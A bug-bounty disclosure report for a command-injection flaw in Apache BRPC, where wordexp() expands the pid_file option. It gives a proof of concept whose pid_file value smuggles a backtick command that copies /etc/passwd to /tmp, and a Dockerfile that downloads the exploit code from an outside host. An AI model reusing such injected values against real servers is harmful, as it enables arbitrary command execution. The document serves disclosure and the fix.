Arbitrary Code Execution in Apache BRPC in apache/brpc

Valid

Reported on

Apr 20th 2023


Description

BRPC is an Industrial-grade RPC framework using C++ Language, which is often used in high performance system such as Search, Storage, Machine learning, Advertisement, Recommendation etc. In server.cpp there are function call to wordexp(), it used for expanding path from user input. Due to lack of security mechanism, this function can be used for running system command.

Attachment

Dockerfile
FROM ubuntu:latest
RUN apt update && apt install -y wget git g++ make cmake libssl-dev libgflags-dev libprotobuf-dev libprotoc-dev protobuf-compiler libleveldb-dev
WORKDIR /
RUN git clone https://github.com/apache/brpc.git
WORKDIR /brpc
RUN cmake -B build && cmake --build build -j4
RUN mkdir -p build/POC
WORKDIR /brpc/build/POC
RUN wget https://exploit.syahrul.dev/brpc_pwn/CMakeLists.txt
RUN wget https://exploit.syahrul.dev/brpc_pwn/poc.cpp
RUN cmake -B build && cmake --build build -j4
docker-compose.yml
version: '3'
services:
  brpc:
    build: . 
    
Inside poc.cpp
#include <brpc/server.h>

int main(int argc, char* argv[]) {
    brpc::Server server;
    brpc::ServerOptions options;
    options.pid_file = "`cat /etc/passwd > /tmp/pwned_by_ru1es`";
    if (server.Start(1337, &options) != 0)
    {
        LOG(ERROR) << "Fail to start HttpServer";
        return -1;
    }
    server.RunUntilAskedToQuit();
    return 0;
}

Step to Reproduce

  1. Save Dockerfile and docker-compose file in one directory
  2. Run docker-compose up
  3. After it finished, launch the container using docker compose run --rm brpc
  4. Inside the container, run ./build/poc
  5. Now check the /tmp/pwned_by_ru1es file

Impact

Running arbitrary command in affected system

Occurrences

This is main root cause, the wordexp function is able to doing system command because there is no security check when user is giving malicious input.

This is the Source of the Sink by injecting system command in _options.pid_file

We are processing your report and will contact the apache/brpc team within 24 hours. 10 months ago
We have contacted a member of the apache/brpc team and are waiting to hear back 10 months ago
apache/brpc maintainer has acknowledged this report 10 months ago
ASF Security Team validated this vulnerability 10 months ago
sahruldotid has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Syahrul
9 months ago

Researcher


I saw the vulnerability has been fixed in latest version 1.5.0 . Any updates in this report ?

Syahrul
9 months ago

Researcher


@admin

Ben Harvie
9 months ago

Admin


On it:)

Ben Harvie
9 months ago

Admin


Could you help me with which specific commit SHA fixed the vulnerability and I can have this marked as valid for you?

Syahrul
9 months ago

Researcher


Pavlos
9 months ago

Admin


Hi Syahrul! Apache is probably strategically delaying the publication of this vulnerability report. Please wait for them to manually publish this finding.

Ben Harvie
8 months ago

Admin


Hey apache maintainers, this does seem to be fixed, could we get a confirmation on this and let us know if you need any assistance in doing so. Thanks!

Ben Harvie marked this as fixed in 1.5.0 with commit 490384 8 months ago
The fix bounty has been dropped
This vulnerability has now been published 8 months ago
server.cpp#L1735 has been validated
server.cpp#L1725 has been validated
to join this conversation